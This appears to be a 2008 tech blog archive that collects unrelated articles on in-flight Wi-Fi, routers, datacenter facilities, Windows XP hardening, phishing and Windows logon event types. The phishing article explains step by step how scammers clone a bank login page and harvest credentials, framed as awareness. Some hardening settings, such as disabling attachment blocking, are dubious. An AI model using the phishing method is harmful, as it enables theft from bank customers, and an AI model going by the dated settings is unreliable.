الاثنين، 24 نوفمبر 2008

Virgin's In-flight Wi-Fi Coming Monday

Virgin America's in-flight Wi-Fi service will launch on Monday for a beta test that is intended to last just one week before a planned commercial launch Dec. 1.

The fledgling domestic airline is making one of the most aggressive moves into in-flight broadband, though most U.S. carriers have announced at least trials or other tests. Virgin plans to have the system from Aircell deployed on all its planes by the middle of next year. On Saturday, it will unveil the service with a flourish, streaming part of the YouTube Live online video event from a plane flying over the San Francisco Bay Area. That plane will go on to serve as the beta test plane, and all passengers who take it will get free Wi-Fi during the test period.

Interest in Wi-Fi on commercial airliners is growing despite the closure of the highest-profile in-flight system, Connexion by Boeing, in 2006. The services, which in general won't allow VoIP (voice over Internet protocol) calls, could be a critical revenue source for ailing airlines as well as a convenience for passengers.

Virgin will charge US$9.95 for a flight of three hours or less and $12.95 for longer flights. Internet access won't be filtered for content or applications, except for the VoIP restriction, said Virgin spokeswoman Abby Lunardini. Aircell has said it has mechanisms to manage the shared bandwidth to prevent one user from taking it all.

Aircell, which is also working with several other carriers, will provide Internet access to planes via its own national network of 3G (third-generation) base stations on the ground. The connection from the plane to the Internet will be via EV-DO (Evolution-Data Optimized) Revision A technology. The base stations are being supplied by ZTE USA, a subsidiary of Chinese telecommunications giant ZTE. Qualcomm, the pioneer of EV-DO, supplied the onboard modems.

Virgin claims it will be the first airline in the U.S. to deploy in-flight broadband on all its planes. It has some advantages in this mission, since it has only 28 planes and all are new. Virgin America itself only started flights in August 2007. Virgin already uses Wi-Fi on its planes for wireless devices that let flight attendants take food and drink orders, Lunardini said. The broadband technology will be added to planes gradually over the following months, she said. There will be multiple aircrafts with the Wi-Fi service before the end of December.

Delta Air Lines said in August it would deploy the Aircell system on all the planes in its main fleet by summer 2009, which in the U.S. ends at about the end of August. American Airlines is offering a service on a limited-time trial, as is JetBlue.

The demand is there from passengers, especially business travelers, but whether more airlines commit to permanent commercial services will depend on price and performance, two longtime wireless analysts said on Thursday.

Key unanswered questions include how well the technical controls will work if someone tries to make VoIP calls or hog the Internet connection with movie downloads, and how the airlines will solve passengers' technical issues without an onboard IT staff, said Jack Gold, principal analyst at J. Gold Associates.

"Users are going to have problems. It just happens," Gold said.

Any new source of revenue will be attractive to the cash-strapped airlines, said Gartner analyst Ken Dulaney. The economics of in-flight broadband have improved since the days of Connexion, with lighter on-board systems helping airlines meet tight budgets for weight, he said. But as a discount airline, Virgin may have a harder time than some at selling the service, Dulaney said.

"We've gotten to this point with the airlines because people didn't want to pay for a meal or anything," Dulaney said.

Linksys Launches WAG160N Wireless Router

Linksys has announced the availability of the WAG160N, a Wireless-N ADSL2+ Gateway that integrates the functionalities of an ADSL2+ Modem, Router, 4-port Switch and a Wireless-N Access Point.

According to a press release, the WAG160N is the newest addition to the Wireless-N line-up and it features the same design as sported by the recent Ultra RangePlus family of Wireless-N routers (WRT160N and WRT310N). The new design features an internal antenna technology which integrates the antenna into the device body.

The WAG160N ships with the Linksys EasyLink Advisor (LELA) application, which provides consumers with a flash video-based guided installation for PC and Mac users. The WAG160N is based on draft 802.11n technology and the built-in Wireless-N Access Point enables users to connect wireless devices in the building without using cables. It also supports Multiple In, Multiple Out (MIMO) technology which is designed to increase the range and reduce 'dead spots' in the wireless coverage area. In addition, the WAG160N supports up to 256-bit industrial-strength encryption and 802.1x authentication and authorization.

The LinkSys WAG160N is available for a price of Rs. 7,925 (US$160).

Why IT Should Get in the Facilities Business

Picture in your mind the facilities management guy or gal in your building: Are you envisioning someone in a pair of overalls and a screwdriver tucked in the back pocket?

If so, who are you going to call when the rack density in the datacenter increases from 2 to 3 kilowatts per rack to 12 kW per rack thanks to IT technologies like virtualization and server consolidation?

If your facilities manager is the screwdriver-in-the-pocket type, don't be surprised when you're told, "You better shut some of these contraptions down!"

Due to the realities of rising energy costs and new energy management systems, the traditional facilities manager is morphing into a tech-savvier operations role, one that is pushing both IT managers and facilities managers into a more consultative relationship. In some cases, facilities management is becoming part of IT.

At a recent Datacenter Users' Group meeting sponsored by Emerson Network Power, 62 percent of the 230 industry experts from Fortune 1000 companies said that collaboration between IT and facilities management has increased over the last 12 months.

Matt Kightlinger, director of solutions at Emerson, believes that driving this convergence is the need for energy efficiency to lead to lower costs. "It is forcing IT and [facilities management] to increase efficiencies from an operations perspective," he says.

But there's been a historic disconnect between IT and facilities, with each making decisions in isolation. "IT buys on performance from IT vendors, so they never get the actual [energy] bill at the end of the month," says David Cappuccio, a Gartner analyst. But the high cost of energy is pushing the two groups together. When the CFO asks IT and facilities about the IT energy budget, each side says the other department is responsible, and that's not an acceptable answer. "Suddenly, both sides are realizing that to create a more efficient infrastructure based on energy, they need to cooperate," he says.

The Shift Starts in the Datacenter

The hot spot for this shift into tech is definitely the datacenter. That is where the business logic for combining IT and facilities management really comes on strong.

Typically, "facilities management" means taking care of the building systems, comfort systems, and power. But facilities management also takes care of the critical energy infrastructure that goes into the datacenter. And that means IT is at least heavily involved with facilities and, in some cases, applies IT techniques itself to managing the energy infrastructure.

The popularity of energy-saving virtualization technology is one reason IT is getting involved in energy infrastructure management. Here's why: The use of virtualization reduces the number of servers needed, decreasing overall energy consumption, but there's now more energy used per server and greater risk to the enterprise if any server fails, since several virtual servers will shut off when the physical server goes.

Suddenly IT finds itself more concerned with increased energy monitoring and cooling at the rack level -- having sufficient juice and cooling in the rack room is not good enough, says Gartner's Cappuccio. That rack-level focus is not an area in which facilities management is experienced.

Server chips from AMD and Intel can trigger automatic alerts when they detect too much heat and even throttle back the chip speed to reduce heat emissions. However, a simple solution like throttling back may not be the answer if those racks are running mission-critical applications during peak business hours. This goes way beyond the room- and building-oriented energy and cooling focus of traditional facilities management, instead requiring systems akin to network management, in which IT has experience.

When the facilities and IT networks are part of a single entity, the unified system will know when peak demand is expected and be able to react better. For example, the policies in such a system could turn on more servers or draw from on-demand resources to better distribute the load, rather than curb performance.

Another area where IT has the experience required for the new energy environment is in asset tracking, says Emerson's Kightlinger. It's not enough to track physical assets, he says; businesses need to also track the power consumption and usage patterns to figure out appropriate load balancing -- the kind of work typically handled through monitoring software IT has long experience with, all managed through a database. "IT managers run that [database]," he says.

But the systems IT has used for monitoring -- such as CA Unicenter, Hewlett-Packard OpenView, and IBM Tivoli -- haven't been designed to understand the implications of energy usage or of business implications of changes, says James White, a product manager at Managed Objects. However, that's beginning to change as "business service management" features -- specifically, ones related to facilities management -- come into the traditional monitoring tools from CA, HP, IBM, and Managed Objects.

The Intertwining of IT and Facilities Outside the Datacenter

The focus of cooperation and even convergence between facilities and IT in the datacenter is driven by ensuring business efficiency and continuity. But outside the datacenter, there's a simpler motivation: cost savings.

Traditionally, HVAC systems are overengineered, so there's redundancy and future capacity built in. That translates to extra ducts and greater cooling or heating capacity than needed -- a reasonable approach because it's been cheaper to allow such waste in return for not requiring major, expensive rework when your demands grew over time. But with ever-increasing energy costs, that approach no longer works well.

Today, IT has the ability to analyze data on energy usage, work patterns, and other facilities domains to reduce the need for such overengineering, thus lowering costs, says Tom Debin, CEO of Equity Through Energy, a building automation supplier. For example, analysis can tell you how many kilowatts are being used per square foot in a building, helping planners decide whether or not to close or renovate the facility.

Or take the case of something as simple as a water heating system in a restaurant. The designer will design for maximum flow on the maximum day with 100 percent use and then put a fudge factor of 25 percent after he gets it printed out and goes to the plumber. The plumber thinks, "I don't want to be called for a repair later, so I will buy the next model up," adding another 25 percent. So by the time it gets to the job site and the customer has a say, you may have a water heater that costs more in both material and energy costs than is justifiable by the actual demand. "Bigger isn't better," says Debin.

The benefits of analysis-based energy management include lower costs for energy, decreased equipment maintenance costs, a reduced carbon footprint, consistency across the real estate portfolio, and increased effectiveness and decreased cost of the extended enterprise, says Dan Sharplin, CEO at Site Controls, a building automation supplier.

"Intelligent" building automation systems that control power usage based on actual consumption and building designs that are less overengineered both bring challenges when deployed, says James Jones, product manager at Infor, an enterprise asset management vendor.

First, managing these systems requires the pervasive use of sensors that are networked together. It is IT that must manage the network and the data it generates. "IT takes responsibility for information systems that get installed at the site," says Jones. "While the guy you want to fix the boiler needs to be a journeyman technician, a lot of times what you are dealing with or alerted about is a condition coming from an information system. So does IT own that?" Whether or not IT owns it, "IT needs to be able to run with it even if someone else installs it," he adds.

Second, IT needs to be able to understand and intelligently act on the data that the building automation systems generate. IT's role doesn't stop at ensuring the system is running as planned, but extends to helping identify new, better ways to reduce waste and increase efficiency. "The key is having the data available to the extended enterprise in an actionable format," says Site Control's Sharplin.

Update Windows

-> Go to http://windowsupdate.microsoft.com
--> Download ALL updates available
---> Reboot when asked to administrator account again
----> Return to this site to download more and more and more patches
-----> Continue to download/install patches, rebooting and returning to this page until you have downloaded ALL patches and cannot download any more patches.
-> Remember to come back to see new patches hopefully every week but atleast once a month! We have set automatic Windowsupdate, but I STILL insist that you recheck for ANY new updates every once and while. Just to be sure. Updating your Windows, Windows Media Player, Internet Explorer, Outlook Express etc. is REALLY THAT IMPORTANT!


Secure file and folder permissions

-> My Computer
--> Right click on your mouse to C:\
---> Properties
----> General
-----> Disable: Allow indexing service to index this disk for fast file searching
----> Security
-----> Add
------> Type: Authenticated Users
-------> Press enter
-----> Select: Authenticated Users
------> Allow: Read & Execute, List folder content, Read
-----> Advanced
------> Unselect: Inherent from parent permission entries...
-------> Copy
------> Remove all other users except: Administrator, System and Authenticated Users
-------> Select: Replace permissions entries...
--------> OK
---------> Yes

--> Go to C:\documents and settings\
---> Right click on your mouse to Administrator folder
----> Properties
-----> Security
------> Advanced
-------> Unselect: Inherent from parent permission entries...
--------> Copy
---------> Remove: Authenticated Users
----------> Select: Replace permission entries...
-----------> OK
------------> Yes
---> Right click on your mouse to, one at the time, all other user folders (like "mom", "userX", etc.)
----> Properties
-----> Security
------> Advanced
-------> Unselect: Inherent parent permission entries
--------> Copy
--------> Remove: Authenticated users
---------> Add that users name (like "mom", "userX", etc.) who's folders these are. This will prevent all other users except admins from getting into their folders.
----------> Allow: Full Control
---------> Select: Replace permission entries...
----------> OK
-----------> Yes
--> Go to C:\windows (or if your Windows is installed onto some other directory, then go there)
---> Select "temp" folder
----> Properties
-----> Security
------> Select: Authenticated Users
-------> Allow: Full Control
--> You can also set permissions like this in other partitions and folders. Please be adviced, that if you store something like games in somewhere, users who need to play those games need to have, usually, full control on those folders so that they can save games etc. Same goes if you store other files in those partitions, like music, documents etc. that other people want to not only access, but also save and edit. Then you should give "Authenticated Users" full permissions on those folders. The main thing is, that your personal folders (C:\documents and settings\userX\) are safe from other peoples tampering and so are important system folders (C:\windows\).

-> To encrypt (EFS) the content of directories and prevent all other users (including administrators) from reading the content of files inside (only in XP pro version) the directory (notice: they can still see the file names and alter folder settings)
-> Only use this for YOUR personal directories (like to folders where you keep personal documents etc.), do not use on system, program, etc. directories!
--> Right click on your mouse to the directory you wish to encrypt
---> Properties
----> General
-----> Advanced
------> Enable: Encrypt the contents to secure data (notice: If you are logged in as administrator, this will encrypt the data for administrator account only. To encrypt data for your USER account, please secure you WindowsXP installation, login as user and then start encrypting your folders)


Adjust event viewer settings

-> Control Panel
--> Performance and maintenance
---> Administrative tools
----> Event viewer
-----> Right click: Application
------> Properties
-------> Maximum log size: 10048
-------> Select: OVerwrite events as needed
-----> Right click: Security
------> Properties
-------> Maximum log size: 10048
--------> Select: Overwrite events as needed
-----> Right click: System
------> Properties
-------> Maximum log size: 10048
--------> Select: Overwrite events as needed

Secure settings

-> Control panel
--> Performance and maintenance
---> Administrative tools
----> Local security policy
-----> Account policies
------> Password policy
------> Enforce password history - 0 passwords remembered
------> Maximum password age - 360 days
------> Minimum password age - 0 days
------> Minimum password lenght - 14 characters
------> Password must meet complexity requirements - Enabled
------> Store passwords using reversible encryption for all users in the domain - Disable
-----> Account lockout policy
------> Account lockout threshold - 3 invalid logon attempts.
------> Account lockout duration - 15 minutes
------> Reset account lockout counter after - 15 minutes
-----> Local policies
------> Audit policy
-------> Audit account logon events - Success, failure
-------> Audit account management - Success, failure
-------> Audit logon events - Success, failure
-------> Audit Object access - Success, failure
-------> Audit policy change - Success, failure
-------> Audit system events - Success, failure
------> User rights assignment
-------> Access this computer from the network -
-------> Act as part of the operating system -
-------> Add workstations to domain -
-------> Adjust memory quotas for a process - LOCAL SERVICE,NETWORK SERVICE,Administrators
-------> Allow logon through Terminal Services -
-------> Back up files and directories - Administrators
-------> Bypass traverse checking - Authenticated Users,Administrators
-------> Change the system time - Administrators
-------> Create a pagefile - Administrators
-------> Create a token object -
-------> Create permanent shared objects -
-------> Debug programs - Administrators
-------> Deny access to this computer from the network - Everyone
-------> Deny logon as a batch job -
-------> Deny logon as a service -
-------> Deny logon locally -
-------> Deny logon through Terminal Services - Everyone
-------> Enable computer and user accounts to be trusted for delegation -
-------> Force shutdown from a remote system -
-------> Generate security audits - LOCAL SERVICE,NETWORK SERVICE
-------> Increase scheduling priority - Administrators
-------> Load and unload device drivers - Administrators
-------> Lock pages in memory - LOCAL SERVICE, Authenticated Users,Administrators
-------> Log on as a batch job -
-------> Log on as a service -
-------> Log on locally - Authenticated Users, Administrators
-------> Manage auditing and security log - Administrators
-------> Modify firmware environment values - Administrators
-------> Perform volume maintenance tasks - Administrators
-------> Profile single process -
-------> Profile system performance -
-------> Remove computer from docking station - Authenticated Users,Administrators
-------> Replace a process level token - LOCAL SERVICE
-------> Restore files and directories - Administrators
-------> Shut down the system - Authenticated Users, Administrators
-------> Synchronize directory service data -
-------> Take ownership of files or other objects - Administrators
------> Security options
-------> Accounts: Administrator account status - Enabled
-------> Accounts: Guest account status - Disabled
-------> Accounts: Limit local account use of blank passwords to console logon only - Enabled
-------> Accounts: Rename administrator account - (TYPE SOME NAME HERE AND USE IT WHEN YOU LOGIN AS ADMINISTRATOR IN THE FUTURE)
-------> Accounts: Rename guest account - Guest
-------> Audit: Audit the access of global system objects - Disabled
-------> Audit: Audit the use of Backup and Restore privilege - Disabled
-------> Audit: Shut down system immediately if unable to log security audits - Disabled
-------> Devices: Allow undock without having to log on - Disabled
-------> Devices: Allowed to format and eject removable media - Administrators
-------> Devices: Prevent users from installing printer drivers - Enabled
-------> Devices: Restrict CD-ROM access to locally logged-on user only - Enabled
-------> Devices: Restrict floppy access to locally logged-on user only - Enabled
-------> Devices: Unsigned driver installation behavior - DO not allow installation
-------> Domain controller: Allow server operators to schedule tasks - Disabled
-------> Domain controller: LDAP server signing requirements - Not defined
-------> Domain controller: Refuse machine account password changes - Enabled
-------> Domain member: Digitally encrypt or sign secure channel data (always) - Enabled
-------> Domain member: Digitally encrypt secure channel data (when possible) - Enabled
-------> Domain member: Digitally sign secure channel data (when possible) - Enabled
-------> Domain member: Disable machine account password changes - Enabled
-------> Domain member: Maximum machine account password age - 1
-------> Domain member: Require strong (Windows 2000 or later) session key - Enabled
-------> Interactive logon: Do not display last user name - Enabled
-------> Interactive logon: Do not require CTRL+ALT+DEL - Disabled
-------> Interactive logon: Message text for users attempting to log on -
-------> Interactive logon: Message title for users attempting to log on -
-------> Interactive logon: Number of previous logons to cache (in case domain controller is not vailable) - 0 logons
-------> Interactive logon: Prompt user to change password before expiration - 14 days
-------> Interactive logon: Require Domain Controller authentication to unlock workstation - Enabled
-------> Interactive logon: Smart card removal behavior - Lock Workstation
-------> Microsoft network client: Digitally sign communications (always) - Enabled
-------> Microsoft network client: Digitally sign communications (if server agrees) - Enabled
-------> Microsoft network client: Send unencrypted password to third-party SMB servers - Disabled
-------> Microsoft network server: Amount of idle time required before suspending session - 1
-------> Microsoft network server: Digitally sign communications (always) - Enabled
-------> Microsoft network server: Digitally sign communications (if client agrees) - Enabled
-------> Microsoft network server: Disconnect clients when logon hours expire - Enabled
-------> Network access: Allow anonymous SID/Name translation - Disabled
-------> Network access: Do not allow anonymous enumeration of SAM accounts - Enabled
-------> Network access: Do not allow anonymous enumeration of SAM accounts and shares - Enabled
-------> Network access: Do not allow storage of credentials or .NET Passports for network authentication - Enabled
-------> Network access: Let Everyone permissions apply to anonymous users - Disabled
-------> Network access: Named Pipes that can be accessed anonymously -
-------> Network access: Remotely accessible registry paths -
-------> Network access: Shares that can be accessed anonymously -
-------> Network access: Sharing and security model for local accounts - Classic local users authenticate as themselves
-------> Network security: Do not store LAN Manager hash value on next password change - Enabled
-------> Network security: Force logoff when logon hours expire - Disabled
-------> Network security: LAN Manager authentication level - Send NTLMv2 response only\refuse LM & NTLM
-------> Network security: LDAP client signing requirements - Require signing
-------> Network security: Minimum session security for NTLM SSP based (including secure RPC) clients - Require message integrity,Require message confidentiality,Require NTLMv2 session security,Require 128-bit encryption
-------> Network security: Minimum session security for NTLM SSP based (including secure RPC) servers - Require message integrity,Require message confidentiality,Require NTLMv2 session security,Require 128-bit encryption
-------> Recovery console: Allow automatic administrative logon - Disabled
-------> Recovery console: Allow floppy copy and access to all drives and all folders - Disabled
-------> Shutdown: Allow system to be shut down without having to log on - Disabled
-------> Shutdown: Clear virtual memory pagefile - Enabled
-------> System cryptography: Use FIPS compliant algorithms for encryption, hashing, and signing - Enabled
-------> System objects: Default owner for objects created by members of the Administrators group - Object creator
-------> System objects: Require case insensitivity for non-Windows subsystems - Enabled
-------> System objects: Strengthen default permissions of internal system objects (e.g. Symbolic Links) - Enabled

Secure Outlook Express

-> Start Outlook Express
--> Tools
---> Options
----> Read
-----> Enable: Read all messages in plaintex
----> Send
-----> Mail sending format
------> Select: Plain text
----> Security
-----> Disable: Do not allow attachments to be saved or opened that could potentially be a virus (if you dont disable this one, your ability to receive attachments is almost zero. Your email virus protection should rely on the fact that you do NOT open files that you receive as email attachments if you are not ABSOLUTELY sure they are safe to be run.)
----> Maintenance
-----> Enable: Purget deleted messages when leaving IMAP folders

WiMax' Troubles With In-building Wireless a Boon to MobileAccess

Even as WiMax promises faster average network speeds than other wireless networks, one company is banking on making money off one of WiMax's downsides -- a difficulty in penetrating the walls of large buildings.

Cathy Zatloukal, CEO of MobileAccess Networks in Vienna, Va., said WiMax wireless transmissions will have just as many, if not more, problems as other cellular signals in passing through walls and specially coated windows in large buildings, such as hospitals, hotels and factories.

That's good for MobileAccess, which has been filtering and amplifying cellular signals since 1998 for thousands of customers who need better indoor wireless connections, Zatloukal said.

In an interview at her booth at WiMax World here this week, Zatloukal said her company has already heard from businesses that would like to use WiMax for outdoor high-speed transmissions between building sites and want to know how they can boost signals indoors. MobileAccess, a partner of Sprint Nextel Corp., has worked with the wireless carrier to connect its amplification and filtering gear to Sprint's cellular base stations inside of buildings.

Inside a building, probably in the basement, MobileAccess would connect a controller box to a WiMax base station, sending data from there over a fiber optic cable to various switches throughout the building. In each switching closet, often located on every floor, the fiber would connect to a MobileAccess hub, where the WiMax signal would be carried over coaxial cable to special antennas in the ceilings.

A prime candidate for WiMax uses inside a business is for video surveillance used to secure parking lots, hallways and rooms. High-quality video surveillance may require 4Mbit/sec. uplink transmission speeds, which WiMax can support, Zatloukal said. But once inside, that wireless signal could be degraded as it passes through concrete walls or the metal coating on windows used to reflect away sunlight in hot climates. With the amplification that MobileAccess provides, the surveillance data over WiMax could make its way to a security command center and could be forwarded to a security guard in another part of the facility, she said.

Machine-to-machine commands over wireless will also be a prime candidate for WiMax, as builders seek ways to control heating and cooling and other systems.

"We see a growing market," Zatloukal said, noting that ABI Research Inc. has estimated that in-building amplification of wireless could be a US$15 billion market in five years. ABI said MobileAccess competes with ADC Telecommunications Inc. in Minneapolis, InnerWireless Inc. in Richardson, Tex., and CommScope Inc., in Hickory, N.C.

How to Avoid Phishing Scams

If you received an E-mail message from your bank saying that your checking account was overdrawn because of a check that you didn’t write, what would you do? Before you answer, it’s important to realize that you may not really be overdrawn and that there is a good chance that someone is trying to scam you. In this article, I will explain exactly how this type of scam works and how to avoid being a victim.

Imagine that tomorrow morning, you get up out of bed and check your E-mail. There is a message from your bank indicating that you are overdrawn on your checking account because a check that you wrote for $2457.83 bounced. You don’t remember writing a check for this amount. What do you do?

Hopefully, you answered that you would call the bank rather than logging onto the bank’s Web site to check out the problem for yourself. The situation that I just described is known as a Phishing (pronounced fishing) scam. Here’s how it works.

The person who is initiating the scam sends an E-mail to millions of people. The E-mail message is designed to appear to come from a bank, Internet Service Provider, online auction company, or from anyone else that you could potentially have regular business dealings with. The From header on the message is spoofed, and the message is designed to look as official as possible. The message’s sole purpose is to gather information.

Let’s go back to my earlier example in which a message allegedly came from your bank indicating that your account is overdrawn because of a check that you didn’t write. The vast majority of the people who receive the message don’t even use the bank that the message claims to be from. In this case though, the message just happens to appear to be from the bank that you use. Because the message appears to be related to a serious matter involving your bank, the person initiating the scam now has your attention.

Typically, such a message will urge you to take action and will provide a link to the bank’s Web site and / or the banks’ phone number. Although the phone number may or may not actually be the bank’s phone number, the Web site URL is never legitimate even if it appears to be legitimate.

Sometimes a person involved in a Phishing scheme will put the bank’s actual phone number in the E-mail in hopes of making the message seem more authentic. Other times though, they will put another number and have someone just waiting for calls from panicked bank customers. This person will typically ask the person who is calling for an account number, a PIN number, and any other information that might be useful, such as a social security number or birth date. The phony bank employee will then pretend to solve the problem while you are on the phone. In actuality though, the problem is just beginning. You weren’t actually overdrawn on your checking account, and now you have given your account information directly to a thief who can use it to clean out your bank account or to launch other identity theft scams.

So what about that official looking URL on the E-mail message? Sure, it probably looks like the bank’s official Web site, but try hovering your mouse over the URL. When you hover your mouse over the URL, you will see the hyper link appear. If the URL is legitimate, the hyperlink should match the URL displayed in the message EXACTLY. Typically, the person who created the message will replace the URL with an IP address, or they will use a domain name that is spelled very similarly to the bank’s domain name. To show you what I am talking about, have a look at Figure A. Figure A contains a very simple Web page that I have created. This page appears to have a link to mybank.com, but if you look at the bottom of Internet Explorer, you will see that the link is actually being directed to http://147.100.100.100. If such a link had been E-mailed to me, the hyperlink would appear in a small pop up rather than at the bottom of the window.

Figure A: This Web page appears to be directed to mybank.com, but is actually pointed at some other Web site instead.

Obviously, the idea behind a Phishing scam is to panic you into clicking on the link contained in the E-mail message and then getting you to enter your bank account number and password. Therefore, you might be wondering how someone could enter their account information into a Web site that does not belong to their bank?

Truthfully, it is very easy to scam someone into entering information into a false Web site. To see how easy it is, try this little experiment. Go to your bank’s Web site and then select the Source command from Internet Explorer’s View menu. This will show you the source code to your bank’s Web site, as shown in Figure B.

Figure B: This is the source code for Bank of America’s Web site.

Actually, you aren’t really looking at the source code. Remember that HTML stands for Hyper Text Mark Up Language. The information that you are seeing is simply the HTML instructions used to display the bank’s home page. Financial institutions typically use a server side scripting language such as ASP to control what visitors to the site actually see.

None of that really matters though because the hacker doesn’t need to recreate the bank’s entire Web site. They only need to recreate the first screen, and the bank has provided them with the HTML code to do it!

The person performing the Phishing scam would simply make a few minor modifications to the code and then upload it to their own Web site. Typically, the modifications would involve the login prompts. Remember that the victim of the scam can’t really log into the fake bank Web site, because the person who created the site has no way of validating the bank customer’s credentials. Instead, the person conducting the scam simply re-engineers the bank’s HTML code so that when the customer enters their account number and password, the account number and password is added to a database. What typically happens next is that the victim is then redirected to the bank’s real home page. Of course they are not logged in when they get there. The victim assumes that they typed the password incorrectly and enters it again. This time they are logged in because they are on the bank’s real Web site. The victim has no idea that they have just given their account number and password to a scam artist.

How Not To Be A Victim

So far, I have given you detailed instructions for how to pull off a Phishing scam. I am not however giving you this information so that you can go rip people off. Instead, I am showing you how a Phishing scam works so that you can avoid being ripped off. Of course, understanding how the scam works is only half of the battle. You still need to know how to spot the scam and avoid being victimized by it.

The best advice that I can give you is that if you ever get an E-mail message from your bank, your ISP, PayPal, EBay, Amazon, etc., read the note over several times. Odds are that the note will appear legitimate, but you need to look for something fishy (no pun intended). For example, does the note have misspellings or bad grammar? Is this the first message that you have ever gotten from the company? Does the company even have your E-mail address on file? If you have any suspicions at all about the message, then the message is probably illegitimate.

The best thing that you can do is to call the company that allegedly sent you the message. Never use the phone number included in the message though. Instead, take the time to look the phone number up in the phone book. It’s better to spend a few extra minutes looking up a number that you already have in front of you than to be a victim of a scam.

Obviously, you should never click on a link within a suspicious message. If you really must visit the Web site that the message claims to be from, enter the site’s address into your browser manually.

Other precautionary steps that you can take are to review your bank statements and credit card statements regularly to make sure that no one is stealing from you or making purchases in your name.

Finally, if you do receive an E-mail message that proves to be a Phishing scam, you should report the message to the company that the message claims to be from. Doing so makes the company aware of the scam so that they can report it to the proper authorities and help keep other people from being ripped off.

Instant Messaging risks

Instant Messaging risks

Instant Messaging
(IM) as a business tool can be quite effective, but any tool can be abused, especially if unmanaged. The best way to manage any communication is to ensure that communication is directed through a central point, like a gateway. Vendors have worked this out and have built clients that are gateway aware and that function as both internal and external IM solutions.

Recently there have been many Instant Messaging vulnerabilities. Antivirus vendors are realising that worms, viruses and other malware can spread through IM and are building new defences that reduce the risk.

Links transferred by the use of IM are an additional risk, the use of application firewalls on the corporate LAN can reduce the risk, but a bigger problem is presented when users take their corporate machines offsite. On unprotected networks application layer firewalls are absent at the perimeter meaning that communication is less secure, for this reason the endpoint requires a host based firewall solution that has scanning capability.

In some organisations where the policy is not to allow Instant Messaging communications, some users have found a way around the firewall technical control by using HTTPS based websites. These websites effectively bypass the scanning and grant access to these users. The problem is that some of these websites capture the data and credentials for spying deliberately.

Because IM does not yet consider authentication mechanisms like two factor authentication, impersonation and unauthorised access is a strong possibility.

Some worms spread using links that are sent to your entire contact list like (W32.Aplore.A@mm), it then installs browser plug-in and then the fun begins. Certain worms patch files and when these systems files are executed. a unique trojanware is downloaded. Backdoors and encrypted tunnels to internet based servers are all common.

Some worms are so volatile and aggressive that in seven seconds Symantec reported that over 500,000 machines were infected and Zombified.

Threats like man in the middle, password theft, information disclosure, data leakage and many more similar threats are all possible and create a significant risk to any business and or individual.


Are there any benefit?

  • Low communication costs.
  • Instant response.
  • Quicker turn around.
  • Instant file sharing.
  • Collaborative approach.

Is there a balance?

With an enforceable security policy and adequate technical controls it is possible to achieve balance. The implementation of application layer firewalls with fifth generation scanning capabilities will better secure your network. Corporate IM servers that scan and manage connections outbound acting like a proxy can provide for greater management and control over the wave clients being used. A strong security policy that can be enforced and implemented by use of network and endpoint technical controls is a must. User education and awareness is key and a consistent and structured approach will ensure a happy medium.



السبت، 22 نوفمبر 2008

Logon Type Codes windows xp, 2003

The logon/logoff category of the Windows security log gives you the ability to monitor all attempts to access the local computer. In this article I'll examine each logon type in greater detail and show you how some other fields in Logon/Logoff events can be helpful for understanding the nature of a given logon attempt.

Event IDs 528 and 540 signify a successful logon, event ID 538 a logoff and all the other events in this category identify different reasons for a logon failure like 680. However, just knowing about a successful or failed logon attempt doesn't fill in the whole picture. Because of all the services Windows offers, there are many different ways you can logon to a computer such as interactively at the computer's local keyboard and screen, over the network through a drive mapping or through terminal services (aka remote desktop) or through IIS. Thankfully, logon/logoff events specify the Logon Type code which reveals the type of logon that prompted the event.

Logon Type 2 – Interactive

This is what occurs to you first when you think of logons, that is, a logon at the console of a computer. You'll see type 2 logons when a user attempts to log on at the local keyboard and screen whether with a domain account or a local account from the computer's local SAM. To tell the difference between an attempt to logon with a local or domain account look for the domain or computer name preceding the user name in the event's description. Don't forget that logon's through an KVM over IP component or a server's proprietary "lights-out" remote KVM feature are still interactive logons from the standpoint of Windows and will be logged as such.

Logon Type 3 – Network

Windows logs logon type 3 in most cases when you access a computer from elsewhere on the network. One of the most common sources of logon events with logon type 3 is connections to shared folders or printers. But other over-the-network logons are classed as logon type 3 as well such as most logons to IIS. (The exception is basic authentication which is explained in Logon Type 8 below.)

Logon Type 4 – Batch

When Windows executes a scheduled task, the Scheduled Task service first creates a new logon session for the task so that it can run under the authority of the user account specified when the task was created. When this logon attempt occurs, Windows logs it as logon type 4. Other job scheduling systems, depending on their design, may also generate logon events with logon type 4 when starting jobs. Logon type 4 events are usually just innocent scheduled tasks startups but a malicious user could try to subvert security by trying to guess the password of an account through scheduled tasks. Such attempts would generate a logon failure event where logon type is 4. But logon failures associated with scheduled tasks can also result from an administrator entering the wrong password for the account at the time of task creation or from the password of an account being changed without modifying the scheduled task to use the new password.

Logon Type 5 – Service

Similar to Scheduled Tasks, each service is configured to run as a specified user account. When a service starts, Windows first creates a logon session for the specified user account which results in a Logon/Logoff event with logon type 5. Failed logon events with logon type 5 usually indicate the password of an account has been changed without updating the service but there's always the possibility of malicious users at work too. However this is less likely because creating a new service or editing an existing service by default requires membership in Administrators or Server Operators and such a user, if malicious, will likely already have enough authority to perpetrate his desired goal.

Logon Type 7 – Unlock

Hopefully the workstations on your network automatically start a password protected screen saver when a user leaves their computer so that unattended workstations are protected from malicious use. When a user returns to their workstation and unlocks the console, Windows treats this as a logon and logs the appropriate Logon/Logoff event but in this case the logon type will be 7 – identifying the event as a workstation unlock attempt. Failed logons with logon type 7 indicate either a user entering the wrong password or a malicious user trying to unlock the computer by guessing the password.

Logon Type 8 – NetworkCleartext

This logon type indicates a network logon like logon type 3 but where the password was sent over the network in the clear text. Windows server doesn't allow connection to shared file or printers with clear text authentication. The only situation I'm aware of are logons from within an ASP script using the ADVAPI or when a user logs on to IIS using IIS's basic authentication mode. In both cases the logon process in the event's description will list advapi. Basic authentication is only dangerous if it isn't wrapped inside an SSL session (i.e. https). As far as logons generated by an ASP, script remember that embedding passwords in source code is a bad practice for maintenance purposes as well as the risk that someone malicious will view the source code and thereby gain the password.

Logon Type 9 – NewCredentials

If you use the RunAs command to start a program under a different user account and specify the /netonly switch, Windows records a logon/logoff event with logon type 9. When you start a program with RunAs using /netonly, the program executes on your local computer as the user you are currently logged on as but for any connections to other computers on the network, Windows connects you to those computers using the account specified on the RunAs command. Without /netonly Windows runs the program on the local computer and on the network as the specified user and records the logon event with logon type 2.

Logon Type 10 – RemoteInteractive

When you access a computer through Terminal Services, Remote Desktop or Remote Assistance windows logs the logon attempt with logon type 10 which makes it easy to distinguish true console logons from a remote desktop session. Note however that prior to XP, Windows 2000 doesn't use logon type 10 and terminal services logons are reported as logon type 2.

